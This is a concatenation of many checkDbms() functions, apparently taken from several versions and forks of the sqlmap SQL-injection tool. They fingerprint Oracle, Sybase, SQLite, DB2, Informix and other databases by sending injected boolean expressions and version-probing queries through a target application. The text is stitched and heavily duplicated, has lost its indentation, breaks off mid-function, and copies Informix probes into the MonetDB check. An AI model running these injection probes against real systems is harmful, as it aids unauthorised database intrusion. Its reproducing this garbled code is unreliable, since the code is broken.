def checkDbms(self):
if not conf.extensiveFp and Backend.isDbmsWithin(H2_ALIASES):
setDbms("%s %s" % (DBMS.H2, Backend.getVersion()))
self.getBanner()
return True
infoMsg = "testing %s" % DBMS.H2
logger.info(infoMsg)
result = inject.checkBooleanExpression("ZERO() IS 0")
if result:
infoMsg = "confirming %s" % DBMS.H2
logger.info(infoMsg)
result = inject.checkBooleanExpression("ROUNDMAGIC(PI())>=3")
if not result:
warnMsg = "the back-end DBMS is not %s" % DBMS.H2
logger.warn(warnMsg)
return False
else:
setDbms(DBMS.H2)
self.getBanner()
return True
else:
warnMsg = "the back-end DBMS is not %s" % DBMS.H2
logger.warn(warnMsg)
return False
def checkDbms(self):
if not conf.extensiveFp and Backend.isDbmsWithin(DB2_ALIASES):
setDbms(DBMS.DB2)
return True
logMsg = "testing %s" % DBMS.DB2
logger.info(logMsg)
result = inject.checkBooleanExpression("[RANDNUM]=(SELECT [RANDNUM] FROM SYSIBM.SYSDUMMY1)")
if result:
logMsg = "confirming %s" % DBMS.DB2
logger.info(logMsg)
version = self._versionCheck()
if version:
Backend.setVersion(version)
setDbms("%s %s" % (DBMS.DB2, Backend.getVersion()))
return True
else:
warnMsg = "the back-end DBMS is not %s" % DBMS.DB2
logger.warn(warnMsg)
return False
def checkDbms(self):
if not conf.extensiveFp and (Backend.isDbmsWithin(MAXDB_ALIASES) or conf.dbms in MAXDB_ALIASES):
setDbms(DBMS.MAXDB)
self.getBanner()
return True
infoMsg = "testing %s" % DBMS.MAXDB
logger.info(infoMsg)
result = inject.checkBooleanExpression("ALPHA(NULL) IS NULL")
if result:
infoMsg = "confirming %s" % DBMS.MAXDB
logger.info(infoMsg)
result = inject.checkBooleanExpression("MAPCHAR(NULL,1,DEFAULTMAP) IS NULL")
if not result:
warnMsg = "the back-end DBMS is not %s" % DBMS.MAXDB
logger.warn(warnMsg)
return False
setDbms(DBMS.MAXDB)
self.getBanner()
return True
else:
warnMsg = "the back-end DBMS is not %s" % DBMS.MAXDB
logger.warn(warnMsg)
return False
def checkDbms(self):
if not conf.extensiveFp and Backend.isDbmsWithin(MAXDB_ALIASES):
setDbms(DBMS.MAXDB)
self.getBanner()
return True
infoMsg = "testing %s" % DBMS.MAXDB
logger.info(infoMsg)
result = inject.checkBooleanExpression("ALPHA(NULL) IS NULL")
if result:
infoMsg = "confirming %s" % DBMS.MAXDB
logger.info(infoMsg)
result = inject.checkBooleanExpression("MAPCHAR(NULL,1,DEFAULTMAP) IS NULL")
if not result:
warnMsg = "the back-end DBMS is not %s" % DBMS.MAXDB
logger.warn(warnMsg)
return False
setDbms(DBMS.MAXDB)
self.getBanner()
return True
else:
warnMsg = "the back-end DBMS is not %s" % DBMS.MAXDB
logger.warn(warnMsg)
return False
def checkDbms(self):
if not conf.extensiveFp and (Backend.isDbmsWithin(SYBASE_ALIASES) \
or (conf.dbms or "").lower() in SYBASE_ALIASES) and Backend.getVersion() and \
Backend.getVersion().isdigit():
setDbms("%s %s" % (DBMS.SYBASE, Backend.getVersion()))
self.getBanner()
Backend.setOs(OS.WINDOWS)
return True
infoMsg = "testing %s" % DBMS.SYBASE
logger.info(infoMsg)
if conf.direct:
result = True
else:
result = inject.checkBooleanExpression("@@transtate=@@transtate")
if result:
infoMsg = "confirming %s" % DBMS.SYBASE
logger.info(infoMsg)
result = inject.checkBooleanExpression("suser_id()=suser_id()")
if not result:
warnMsg = "the back-end DBMS is not %s" % DBMS.SYBASE
logger.warn(warnMsg)
return False
setDbms(DBMS.SYBASE)
self.getBanner()
if not conf.extensiveFp:
return True
infoMsg = "actively fingerprinting %s" % DBMS.SYBASE
logger.info(infoMsg)
result = unArrayizeValue(inject.getValue("SUBSTRING(@@VERSION,1,1)"))
if result and result.isdigit():
Backend.setVersion(str(result))
else:
for version in xrange(12, 16):
result = inject.checkBooleanExpression("PATINDEX('%%/%d[./]%%',@@VERSION)>0" % version)
if result:
Backend.setVersion(str(version))
break
return True
else:
warnMsg = "the back-end DBMS is not %s" % DBMS.SYBASE
logger.warn(warnMsg)
return False
def checkDbms(self):
if not conf.extensiveFp and Backend.isDbmsWithin(MONETDB_ALIASES):
setDbms(DBMS.MONETDB)
self.getBanner()
return True
infoMsg = "testing %s" % DBMS.MONETDB
logger.info(infoMsg)
result = inject.checkBooleanExpression("isaurl(NULL)=false")
if result:
infoMsg = "confirming %s" % DBMS.MONETDB
logger.info(infoMsg)
result = inject.checkBooleanExpression("CODE(0) IS NOT NULL")
if not result:
warnMsg = "the back-end DBMS is not %s" % DBMS.MONETDB
logger.warn(warnMsg)
return False
setDbms(DBMS.MONETDB)
self.getBanner()
return True
else:
warnMsg = "the back-end DBMS is not %s" % DBMS.MONETDB
logger.warn(warnMsg)
return False
def checkDbms(self):
if not conf.extensiveFp and (Backend.isDbmsWithin(DB2_ALIASES) or conf.dbms in DB2_ALIASES):
setDbms(DBMS.DB2)
return True
logMsg = "testing %s" % DBMS.DB2
logger.info(logMsg)
randInt = randomInt()
result = inject.checkBooleanExpression("%d=(SELECT %d FROM SYSIBM.SYSDUMMY1)" % (randInt, randInt))
if result:
logMsg = "confirming %s" % DBMS.DB2
logger.info(logMsg)
version = self._versionCheck()
if version:
Backend.setVersion(version)
setDbms("%s %s" % (DBMS.DB2, Backend.getVersion()))
return True
else:
warnMsg = "the back-end DBMS is not %s" % DBMS.DB2
logger.warn(warnMsg)
return False
def checkDbms(self):
if not conf.extensiveFp and Backend.isDbmsWithin(H2_ALIASES):
setDbms("%s %s" % (DBMS.H2, Backend.getVersion()))
self.getBanner()
return True
infoMsg = "testing %s" % DBMS.H2
logger.info(infoMsg)
result = inject.checkBooleanExpression("ZERO() IS 0")
if result:
infoMsg = "confirming %s" % DBMS.H2
logger.info(infoMsg)
result = inject.checkBooleanExpression("ROUNDMAGIC(PI())>=3")
if not result:
warnMsg = "the back-end DBMS is not %s" % DBMS.H2
logger.warn(warnMsg)
return False
else:
setDbms(DBMS.H2)
self.getBanner()
return True
else:
warnMsg = "the back-end DBMS is not %s" % DBMS.H2
logger.warn(warnMsg)
return False
def checkDbms(self):
if not conf.extensiveFp and Backend.isDbmsWithin(MCKOI_ALIASES):
setDbms(DBMS.MCKOI)
return True
infoMsg = "testing %s" % DBMS.MCKOI
logger.info(infoMsg)
result = inject.checkBooleanExpression("DATEOB()>=DATEOB(NULL)")
if result:
infoMsg = "confirming %s" % DBMS.MCKOI
logger.info(infoMsg)
result = inject.checkBooleanExpression("ABS(1/0)>ABS(0/1)")
if not result:
warnMsg = "the back-end DBMS is not %s" % DBMS.MCKOI
logger.warn(warnMsg)
return False
setDbms(DBMS.MCKOI)
return True
else:
warnMsg = "the back-end DBMS is not %s" % DBMS.MCKOI
logger.warn(warnMsg)
return False
def checkDbms(self):
if not conf.extensiveFp and Backend.isDbmsWithin(SYBASE_ALIASES):
setDbms("%s %s" % (DBMS.SYBASE, Backend.getVersion()))
self.getBanner()
Backend.setOs(OS.WINDOWS)
return True
infoMsg = "testing %s" % DBMS.SYBASE
logger.info(infoMsg)
if conf.direct:
result = True
else:
result = inject.checkBooleanExpression("@@transtate=@@transtate")
if result:
infoMsg = "confirming %s" % DBMS.SYBASE
logger.info(infoMsg)
result = inject.checkBooleanExpression("suser_id()=suser_id()")
if not result:
warnMsg = "the back-end DBMS is not %s" % DBMS.SYBASE
logger.warn(warnMsg)
return False
setDbms(DBMS.SYBASE)
self.getBanner()
if not conf.extensiveFp:
return True
infoMsg = "actively fingerprinting %s" % DBMS.SYBASE
logger.info(infoMsg)
result = unArrayizeValue(
inject.getValue("SUBSTRING(@@VERSION,1,1)"))
if result and result.isdigit():
Backend.setVersion(str(result))
else:
for version in xrange(12, 16):
result = inject.checkBooleanExpression(
"PATINDEX('%%/%d[./]%%',@@VERSION)>0" % version)
if result:
Backend.setVersion(str(version))
break
return True
else:
warnMsg = "the back-end DBMS is not %s" % DBMS.SYBASE
logger.warn(warnMsg)
return False
def checkDbms(self):
if not conf.extensiveFp and Backend.isDbmsWithin(RAIMA_ALIASES):
setDbms(DBMS.RAIMA)
return True
infoMsg = "testing %s" % DBMS.RAIMA
logger.info(infoMsg)
result = inject.checkBooleanExpression("ROWNUMBER()=ROWNUMBER()")
if result:
infoMsg = "confirming %s" % DBMS.RAIMA
logger.info(infoMsg)
result = inject.checkBooleanExpression(
"INSSTR('[RANDSTR1]',0,0,'[RANDSTR2]') IS NOT NULL")
if not result:
warnMsg = "the back-end DBMS is not %s" % DBMS.RAIMA
logger.warn(warnMsg)
return False
setDbms(DBMS.RAIMA)
return True
else:
warnMsg = "the back-end DBMS is not %s" % DBMS.RAIMA
logger.warn(warnMsg)
return False
def checkDbms(self):
if not conf.extensiveFp and Backend.isDbmsWithin(ORACLE_ALIASES):
setDbms(DBMS.ORACLE)
self.getBanner()
return True
infoMsg = "testing %s" % DBMS.ORACLE
logger.info(infoMsg)
# NOTE: SELECT LENGTH(SYSDATE)=LENGTH(SYSDATE) FROM DUAL does
# not work connecting directly to the Oracle database
if conf.direct:
result = True
else:
result = inject.checkBooleanExpression("LENGTH(SYSDATE)=LENGTH(SYSDATE)")
if result:
infoMsg = "confirming %s" % DBMS.ORACLE
logger.info(infoMsg)
# NOTE: SELECT NVL(RAWTOHEX([RANDNUM1]),[RANDNUM1])=RAWTOHEX([RANDNUM1]) FROM DUAL does
# not work connecting directly to the Oracle database
if conf.direct:
result = True
else:
result = inject.checkBooleanExpression("NVL(RAWTOHEX([RANDNUM1]),[RANDNUM1])=RAWTOHEX([RANDNUM1])")
if not result:
warnMsg = "the back-end DBMS is not %s" % DBMS.ORACLE
logger.warn(warnMsg)
return False
setDbms(DBMS.ORACLE)
self.getBanner()
if not conf.extensiveFp:
return True
infoMsg = "actively fingerprinting %s" % DBMS.ORACLE
logger.info(infoMsg)
# Reference: https://en.wikipedia.org/wiki/Oracle_Database
for version in ("12c", "11g", "10g", "9i", "8i"):
number = int(re.search(r"([\d]+)", version).group(1))
output = inject.checkBooleanExpression("%d=(SELECT SUBSTR((VERSION),1,%d) FROM SYS.PRODUCT_COMPONENT_VERSION WHERE ROWNUM=1)" % (number, 1 if number < 10 else 2))
if output:
Backend.setVersion(version)
break
return True
else:
warnMsg = "the back-end DBMS is not %s" % DBMS.ORACLE
logger.warn(warnMsg)
return False
def checkDbms(self):
if not conf.extensiveFp and Backend.isDbmsWithin(VIRTUOSO_ALIASES):
setDbms(DBMS.VIRTUOSO)
return True
infoMsg = "testing %s" % DBMS.VIRTUOSO
logger.info(infoMsg)
result = inject.checkBooleanExpression(
"GET_KEYWORD(NULL,NULL) IS NULL")
if result:
infoMsg = "confirming %s" % DBMS.VIRTUOSO
logger.info(infoMsg)
result = inject.checkBooleanExpression(
"RDF_NOW_IMPL() IS NOT NULL")
if not result:
warnMsg = "the back-end DBMS is not %s" % DBMS.VIRTUOSO
logger.warn(warnMsg)
return False
setDbms(DBMS.VIRTUOSO)
return True
else:
warnMsg = "the back-end DBMS is not %s" % DBMS.VIRTUOSO
logger.warn(warnMsg)
return False
def checkDbms(self):
if not conf.extensiveFp and (Backend.isDbmsWithin(ORACLE_ALIASES) or (conf.dbms or "").lower() in ORACLE_ALIASES):
setDbms(DBMS.ORACLE)
self.getBanner()
return True
infoMsg = "testing %s" % DBMS.ORACLE
logger.info(infoMsg)
# NOTE: SELECT ROWNUM=ROWNUM FROM DUAL does not work connecting
# directly to the Oracle database
if conf.direct:
result = True
else:
result = inject.checkBooleanExpression("ROWNUM=ROWNUM")
if result:
infoMsg = "confirming %s" % DBMS.ORACLE
logger.info(infoMsg)
# NOTE: SELECT LENGTH(SYSDATE)=LENGTH(SYSDATE) FROM DUAL does
# not work connecting directly to the Oracle database
if conf.direct:
result = True
else:
result = inject.checkBooleanExpression("LENGTH(SYSDATE)=LENGTH(SYSDATE)")
if not result:
warnMsg = "the back-end DBMS is not %s" % DBMS.ORACLE
logger.warn(warnMsg)
return False
setDbms(DBMS.ORACLE)
self.getBanner()
if not conf.extensiveFp:
return True
infoMsg = "actively fingerprinting %s" % DBMS.ORACLE
logger.info(infoMsg)
for version in ("11i", "10g", "9i", "8i"):
number = int(re.search("([\d]+)", version).group(1))
output = inject.checkBooleanExpression("%d=(SELECT SUBSTR((VERSION),1,%d) FROM SYS.PRODUCT_COMPONENT_VERSION WHERE ROWNUM=1)" % (number, 1 if number < 10 else 2))
if output:
Backend.setVersion(version)
break
return True
else:
warnMsg = "the back-end DBMS is not %s" % DBMS.ORACLE
logger.warn(warnMsg)
return False
def checkDbms(self):
if not conf.extensiveFp and (Backend.isDbmsWithin(ORACLE_ALIASES) or conf.dbms in ORACLE_ALIASES):
setDbms(DBMS.ORACLE)
self.getBanner()
return True
infoMsg = "testing %s" % DBMS.ORACLE
logger.info(infoMsg)
# NOTE: SELECT ROWNUM=ROWNUM FROM DUAL does not work connecting
# directly to the Oracle database
if conf.direct:
result = True
else:
result = inject.checkBooleanExpression("ROWNUM=ROWNUM")
if result:
infoMsg = "confirming %s" % DBMS.ORACLE
logger.info(infoMsg)
# NOTE: SELECT LENGTH(SYSDATE)=LENGTH(SYSDATE) FROM DUAL does
# not work connecting directly to the Oracle database
if conf.direct:
result = True
else:
result = inject.checkBooleanExpression("LENGTH(SYSDATE)=LENGTH(SYSDATE)")
if not result:
warnMsg = "the back-end DBMS is not %s" % DBMS.ORACLE
logger.warn(warnMsg)
return False
setDbms(DBMS.ORACLE)
self.getBanner()
if not conf.extensiveFp:
return True
infoMsg = "actively fingerprinting %s" % DBMS.ORACLE
logger.info(infoMsg)
for version in ("11i", "10g", "9i", "8i"):
number = int(re.search("([\d]+)", version).group(1))
output = inject.checkBooleanExpression("%d=(SELECT SUBSTR((VERSION),1,%d) FROM SYS.PRODUCT_COMPONENT_VERSION WHERE ROWNUM=1)" % (number, 1 if number < 10 else 2))
if output:
Backend.setVersion(version)
break
return True
else:
warnMsg = "the back-end DBMS is not %s" % DBMS.ORACLE
logger.warn(warnMsg)
return False
def checkDbms(self):
if not conf.extensiveFp and (Backend.isDbmsWithin(SYBASE_ALIASES) \
or conf.dbms in SYBASE_ALIASES) and Backend.getVersion() and \
Backend.getVersion().isdigit():
setDbms("%s %s" % (DBMS.SYBASE, Backend.getVersion()))
self.getBanner()
Backend.setOs(OS.WINDOWS)
return True
infoMsg = "testing %s" % DBMS.SYBASE
logger.info(infoMsg)
if conf.direct:
result = True
else:
result = inject.checkBooleanExpression("tempdb_id()=tempdb_id()")
if result:
infoMsg = "confirming %s" % DBMS.SYBASE
logger.info(infoMsg)
result = inject.checkBooleanExpression("suser_id()=suser_id()")
if not result:
warnMsg = "the back-end DBMS is not %s" % DBMS.SYBASE
logger.warn(warnMsg)
return False
setDbms(DBMS.SYBASE)
self.getBanner()
if not conf.extensiveFp:
return True
infoMsg = "actively fingerprinting %s" % DBMS.SYBASE
logger.info(infoMsg)
for version in xrange(12, 16):
result = inject.checkBooleanExpression(
"@@VERSION_NUMBER/1000=%d" % version)
if result:
Backend.setVersion(str(version))
break
return True
else:
warnMsg = "the back-end DBMS is not %s" % DBMS.SYBASE
logger.warn(warnMsg)
return False
def checkDbms(self):
if not conf.extensiveFp and Backend.isDbmsWithin(INFORMIX_ALIASES):
setDbms(DBMS.INFORMIX)
self.getBanner()
return True
infoMsg = "testing %s" % DBMS.INFORMIX
logger.info(infoMsg)
result = inject.checkBooleanExpression(
"[RANDNUM]=(SELECT [RANDNUM] FROM SYSMASTER:SYSDUAL)")
if result:
infoMsg = "confirming %s" % DBMS.INFORMIX
logger.info(infoMsg)
result = inject.checkBooleanExpression(
"(SELECT DBINFO('DBNAME') FROM SYSMASTER:SYSDUAL) IS NOT NULL")
if not result:
warnMsg = "the back-end DBMS is not %s" % DBMS.INFORMIX
logger.warn(warnMsg)
return False
# Determine if it is Informix >= 11.70
if inject.checkBooleanExpression("CHR(32)=' '"):
Backend.setVersion(">= 11.70")
setDbms(DBMS.INFORMIX)
self.getBanner()
if not conf.extensiveFp:
return True
infoMsg = "actively fingerprinting %s" % DBMS.INFORMIX
logger.info(infoMsg)
for version in ("12.1", "11.7", "11.5"):
output = inject.checkBooleanExpression(
"EXISTS(SELECT 1 FROM SYSMASTER:SYSDUAL WHERE DBINFO('VERSION,'FULL') LIKE '%%%s%%')"
% version)
if output:
Backend.setVersion(version)
break
return True
else:
warnMsg = "the back-end DBMS is not %s" % DBMS.INFORMIX
logger.warn(warnMsg)
return False
def checkDbms(self):
if conf.dbms in SYBASE_ALIASES and kb.dbmsVersion and kb.dbmsVersion[0].isdigit():
setDbms("%s %s" % (DBMS.SYBASE, kb.dbmsVersion[0]))
self.getBanner()
if not conf.extensiveFp:
kb.os = "Windows"
return True
infoMsg = "testing Sybase"
logger.info(infoMsg)
if conf.direct:
result = True
else:
payload = agent.fullPayload("AND tempdb_id()=tempdb_id()")
result = Request.queryPage(payload)
if result:
logMsg = "confirming Sybase"
logger.info(logMsg)
payload = agent.fullPayload("AND suser_id()=suser_id()")
result = Request.queryPage(payload)
if not result:
warnMsg = "the back-end DBMS is not Sybase"
logger.warn(warnMsg)
return False
setDbms(DBMS.SYBASE)
self.getBanner()
if not conf.extensiveFp:
return True
for version in range(12, 16):
randInt = randomInt()
query = "AND @@VERSION_NUMBER/1000=%d" % version
payload = agent.fullPayload(query)
result = Request.queryPage(payload)
if result:
kb.dbmsVersion = ["%d" % version]
break
return True
else:
warnMsg = "the back-end DBMS is not Sybase"
logger.warn(warnMsg)
return False
def checkDbms(self):
if not conf.extensiveFp and (Backend.isDbmsWithin(SYBASE_ALIASES) \
or conf.dbms in SYBASE_ALIASES) and Backend.getVersion() and \
Backend.getVersion().isdigit():
setDbms("%s %s" % (DBMS.SYBASE, Backend.getVersion()))
self.getBanner()
Backend.setOs(OS.WINDOWS)
return True
infoMsg = "testing %s" % DBMS.SYBASE
logger.info(infoMsg)
if conf.direct:
result = True
else:
result = inject.checkBooleanExpression("tempdb_id()=tempdb_id()")
if result:
infoMsg = "confirming %s" % DBMS.SYBASE
logger.info(infoMsg)
result = inject.checkBooleanExpression("suser_id()=suser_id()")
if not result:
warnMsg = "the back-end DBMS is not %s" % DBMS.SYBASE
logger.warn(warnMsg)
return False
setDbms(DBMS.SYBASE)
self.getBanner()
if not conf.extensiveFp:
return True
infoMsg = "actively fingerprinting %s" % DBMS.SYBASE
logger.info(infoMsg)
for version in xrange(12, 16):
result = inject.checkBooleanExpression("@@VERSION_NUMBER/1000=%d" % version)
if result:
Backend.setVersion(str(version))
break
return True
else:
warnMsg = "the back-end DBMS is not %s" % DBMS.SYBASE
logger.warn(warnMsg)
return False
def checkDbms(self):
"""
References for fingerprint:
* http://www.sqlite.org/lang_corefunc.html
* http://www.sqlite.org/cvstrac/wiki?p=LoadableExtensions
"""
if not conf.extensiveFp and (Backend.isDbmsWithin(SQLITE_ALIASES) or
(conf.dbms
or "").lower() in SQLITE_ALIASES):
setDbms(DBMS.SQLITE)
self.getBanner()
return True
infoMsg = "testing %s" % DBMS.SQLITE
logger.info(infoMsg)
result = inject.checkBooleanExpression(
"LAST_INSERT_ROWID()=LAST_INSERT_ROWID()")
if result:
infoMsg = "confirming %s" % DBMS.SQLITE
logger.info(infoMsg)
result = inject.checkBooleanExpression(
"SQLITE_VERSION()=SQLITE_VERSION()")
if not result:
warnMsg = "the back-end DBMS is not %s" % DBMS.SQLITE
logger.warn(warnMsg)
return False
else:
infoMsg = "actively fingerprinting %s" % DBMS.SQLITE
logger.info(infoMsg)
result = inject.checkBooleanExpression("RANDOMBLOB(-1)>0")
version = '3' if result else '2'
Backend.setVersion(version)
setDbms(DBMS.SQLITE)
self.getBanner()
return True
else:
warnMsg = "the back-end DBMS is not %s" % DBMS.SQLITE
logger.warn(warnMsg)
return False
def checkDbms(self):
if conf.dbms in ORACLE_ALIASES:
setDbms("Oracle")
self.getBanner()
if not conf.extensiveFp:
return True
logMsg = "testing Oracle"
logger.info(logMsg)
payload = agent.fullPayload(" AND ROWNUM=ROWNUM")
result = Request.queryPage(payload)
if result:
logMsg = "confirming Oracle"
logger.info(logMsg)
payload = agent.fullPayload(" AND LENGTH(SYSDATE)=LENGTH(SYSDATE)")
result = Request.queryPage(payload)
if not result:
warnMsg = "the back-end DMBS is not Oracle"
logger.warn(warnMsg)
return False
setDbms("Oracle")
self.getBanner()
if not conf.extensiveFp:
return True
query = "SELECT SUBSTR((VERSION), 1, 2) FROM SYS.PRODUCT_COMPONENT_VERSION WHERE ROWNUM=1"
version = inject.getValue(query, unpack=False)
if re.search("^11", version):
kb.dbmsVersion = ["11i"]
elif re.search("^10", version):
kb.dbmsVersion = ["10g"]
elif re.search("^9", version):
kb.dbmsVersion = ["9i"]
elif re.search("^8", version):
kb.dbmsVersion = ["8i"]
return True
else:
warnMsg = "the back-end DMBS is not Oracle"
logger.warn(warnMsg)
return False
def checkDbms(self):
if conf.dbms in ORACLE_ALIASES:
setDbms("Oracle")
self.getPrematureBanner(
"SELECT banner FROM v$version WHERE ROWNUM=1")
if not conf.extensiveFp:
return True
logMsg = "testing Oracle"
logger.info(logMsg)
query = "LENGTH(SYSDATE)"
sysdate = inject.getValue(query)
if sysdate and int(sysdate) > 0:
logMsg = "confirming Oracle"
logger.info(logMsg)
query = "SELECT SUBSTR((VERSION), 1, 2) FROM SYS.PRODUCT_COMPONENT_VERSION WHERE ROWNUM=1"
version = inject.getValue(query)
if not version:
warnMsg = "the back-end DMBS is not Oracle"
logger.warn(warnMsg)
return False
setDbms("Oracle")
self.getPrematureBanner(
"SELECT banner FROM v$version WHERE ROWNUM=1")
if not conf.extensiveFp:
return True
if re.search("^11", version):
kb.dbmsVersion = ["11i"]
elif re.search("^10", version):
kb.dbmsVersion = ["10g"]
elif re.search("^9", version):
kb.dbmsVersion = ["9i"]
elif re.search("^8", version):
kb.dbmsVersion = ["8i"]
return True
else:
warnMsg = "the back-end DMBS is not Oracle"
logger.warn(warnMsg)
return False
def checkDbms(self):
if not conf.extensiveFp and Backend.isDbmsWithin(INFORMIX_ALIASES):
setDbms(DBMS.INFORMIX)
self.getBanner()
return True
infoMsg = "testing %s" % DBMS.INFORMIX
logger.info(infoMsg)
result = inject.checkBooleanExpression("[RANDNUM]=(SELECT [RANDNUM] FROM SYSMASTER:SYSDUAL)")
if result:
infoMsg = "confirming %s" % DBMS.INFORMIX
logger.info(infoMsg)
result = inject.checkBooleanExpression("(SELECT DBINFO('DBNAME') FROM SYSMASTER:SYSDUAL) IS NOT NULL")
if not result:
warnMsg = "the back-end DBMS is not %s" % DBMS.INFORMIX
logger.warn(warnMsg)
return False
# Determine if it is Informix >= 11.70
if inject.checkBooleanExpression("CHR(32)=' '"):
Backend.setVersion(">= 11.70")
setDbms(DBMS.INFORMIX)
self.getBanner()
if not conf.extensiveFp:
return True
infoMsg = "actively fingerprinting %s" % DBMS.INFORMIX
logger.info(infoMsg)
for version in ("12.1", "11.7", "11.5"):
output = inject.checkBooleanExpression("EXISTS(SELECT 1 FROM SYSMASTER:SYSDUAL WHERE DBINFO('VERSION,'FULL') LIKE '%%%s%%')" % version)
if output:
Backend.setVersion(version)
break
return True
else:
warnMsg = "the back-end DBMS is not %s" % DBMS.INFORMIX
logger.warn(warnMsg)
return False
def checkDbms(self):
"""
References for fingerprint:
* http://www.sqlite.org/lang_corefunc.html
* http://www.sqlite.org/cvstrac/wiki?p=LoadableExtensions
"""
if conf.dbms in SQLITE_ALIASES:
setDbms(DBMS.SQLITE)
self.getBanner()
if not conf.extensiveFp:
return True
logMsg = "testing SQLite"
logger.info(logMsg)
payload = agent.fullPayload("AND LAST_INSERT_ROWID()=LAST_INSERT_ROWID()")
result = Request.queryPage(payload)
if result:
logMsg = "confirming SQLite"
logger.info(logMsg)
payload = agent.fullPayload("AND SQLITE_VERSION()=SQLITE_VERSION()")
result = Request.queryPage(payload)
if not result:
warnMsg = "the back-end DBMS is not SQLite"
logger.warn(warnMsg)
return False
setDbms(DBMS.SQLITE)
self.getBanner()
if not conf.extensiveFp:
return True
version = inject.getValue("SELECT SUBSTR((SQLITE_VERSION()), 1, 1)", unpack=False, charsetType=2, suppressOutput=True)
kb.dbmsVersion = [ version ]
return True
else:
warnMsg = "the back-end DBMS is not SQLite"
logger.warn(warnMsg)
return False
def checkDbms(self):
"""
References for fingerprint:
* http://www.sqlite.org/lang_corefunc.html
* http://www.sqlite.org/cvstrac/wiki?p=LoadableExtensions
"""
if not conf.extensiveFp and Backend.isDbmsWithin(SQLITE_ALIASES):
setDbms(DBMS.SQLITE)
self.getBanner()
return True
infoMsg = u"测试%s" % DBMS.SQLITE
logger.info(infoMsg)
result = inject.checkBooleanExpression(
"LAST_INSERT_ROWID()=LAST_INSERT_ROWID()")
if result:
infoMsg = u"确认后端数据库是%s" % DBMS.SQLITE
logger.info(infoMsg)
result = inject.checkBooleanExpression(
"SQLITE_VERSION()=SQLITE_VERSION()")
if not result:
warnMsg = u"后端DBMS不是%s" % DBMS.SQLITE
logger.warn(warnMsg)
return False
else:
infoMsg = u"主动指纹识别为%s" % DBMS.SQLITE
logger.info(infoMsg)
result = inject.checkBooleanExpression("RANDOMBLOB(-1)>0")
version = '3' if result else '2'
Backend.setVersion(version)
setDbms(DBMS.SQLITE)
self.getBanner()
return True
else:
warnMsg = u"后端DBMS不是%s" % DBMS.SQLITE
logger.warn(warnMsg)
return False
def checkDbms(self):
if not conf.extensiveFp and Backend.isDbmsWithin(VERTICA_ALIASES):
setDbms(DBMS.VERTICA)
self.getBanner()
return True
infoMsg = "testing %s" % DBMS.VERTICA
logger.info(infoMsg)
# NOTE: Vertica works too without the CONVERT_TO()
result = inject.checkBooleanExpression(
"BITSTRING_TO_BINARY(NULL) IS NULL")
if result:
infoMsg = "confirming %s" % DBMS.VERTICA
logger.info(infoMsg)
result = inject.checkBooleanExpression(
"HEX_TO_INTEGER(NULL) IS NULL")
if not result:
warnMsg = "the back-end DBMS is not %s" % DBMS.VERTICA
logger.warn(warnMsg)
return False
setDbms(DBMS.VERTICA)
self.getBanner()
if not conf.extensiveFp:
return True
infoMsg = "actively fingerprinting %s" % DBMS.VERTICA
logger.info(infoMsg)
if inject.checkBooleanExpression(
"CALENDAR_HIERARCHY_DAY(NULL) IS NULL"):
Backend.setVersion(">= 9.0")
else:
Backend.setVersion("< 9.0")
return True
else:
warnMsg = "the back-end DBMS is not %s" % DBMS.VERTICA
logger.warn(warnMsg)
return False
def checkDbms(self):
if conf.dbms in ORACLE_ALIASES:
setDbms("Oracle")
self.getPrematureBanner("SELECT banner FROM v$version WHERE ROWNUM=1")
if not conf.extensiveFp:
return True
logMsg = "testing Oracle"
logger.info(logMsg)
query = "LENGTH(SYSDATE)"
sysdate = inject.getValue(query)
if sysdate and int(sysdate) > 0:
logMsg = "confirming Oracle"
logger.info(logMsg)
query = "SELECT SUBSTR((VERSION), 1, 2) FROM SYS.PRODUCT_COMPONENT_VERSION WHERE ROWNUM=1"
version = inject.getValue(query)
if not version:
warnMsg = "the back-end DMBS is not Oracle"
logger.warn(warnMsg)
return False
setDbms("Oracle")
self.getPrematureBanner("SELECT banner FROM v$version WHERE ROWNUM=1")
if not conf.extensiveFp:
return True
if re.search("^11", version):
kb.dbmsVersion = ["11i"]
elif re.search("^10", version):
kb.dbmsVersion = ["10g"]
elif re.search("^9", version):
kb.dbmsVersion = ["9i"]
elif re.search("^8", version):
kb.dbmsVersion = ["8i"]
return True
else:
warnMsg = "the back-end DMBS is not Oracle"
logger.warn(warnMsg)
return False
def checkDbms(self):
if not conf.extensiveFp and Backend.isDbmsWithin(MONETDB_ALIASES):
setDbms(DBMS.MONETDB)
self.getBanner()
return True
infoMsg = "testing %s" % DBMS.MONETDB
logger.info(infoMsg)
result = inject.checkBooleanExpression("isaurl(NULL)=false")
if result:
infoMsg = "confirming %s" % DBMS.MONETDB
logger.info(infoMsg)
result = inject.checkBooleanExpression("CODE(0) IS NOT NULL")
if not result:
warnMsg = "the back-end DBMS is not %s" % DBMS.MONETDB
logger.warn(warnMsg)
return False
setDbms(DBMS.MONETDB)
self.getBanner()
if not conf.extensiveFp:
return True
infoMsg = "actively fingerprinting %s" % DBMS.MONETDB
logger.info(infoMsg)
for version in ("14.1", "12.1", "11.7", "11.5", "10.0"):
output = inject.checkBooleanExpression(
"EXISTS(SELECT 1 FROM SYSMASTER:SYSDUAL WHERE DBINFO('VERSION,'FULL') LIKE '%%%s%%')"
% version)
if output:
Backend.setVersion(version)
break
return True
else:
warnMsg = "the back-end DBMS is not %s" % DBMS.MONETDB
logger.warn(warnMsg)
return False
def checkDbms(self):
"""
References for fingerprint:
* http://www.sqlite.org/lang_corefunc.html
* http://www.sqlite.org/cvstrac/wiki?p=LoadableExtensions
"""
if not conf.extensiveFp and (Backend.isDbmsWithin(SQLITE_ALIASES) or (conf.dbms or "").lower() in SQLITE_ALIASES):
setDbms(DBMS.SQLITE)
self.getBanner()
return True
infoMsg = "testing %s" % DBMS.SQLITE
logger.info(infoMsg)
result = inject.checkBooleanExpression("LAST_INSERT_ROWID()=LAST_INSERT_ROWID()")
if result:
infoMsg = "confirming %s" % DBMS.SQLITE
logger.info(infoMsg)
result = inject.checkBooleanExpression("SQLITE_VERSION()=SQLITE_VERSION()")
if not result:
warnMsg = "the back-end DBMS is not %s" % DBMS.SQLITE
logger.warn(warnMsg)
return False
else:
infoMsg = "actively fingerprinting %s" % DBMS.SQLITE
logger.info(infoMsg)
result = inject.checkBooleanExpression("RANDOMBLOB(-1)>0")
version = '3' if result else '2'
Backend.setVersion(version)
setDbms(DBMS.SQLITE)
self.getBanner()
return True
else:
warnMsg = "the back-end DBMS is not %s" % DBMS.SQLITE
logger.warn(warnMsg)
return False
def checkDbms(self):
if conf.dbms in FIREBIRD_ALIASES:
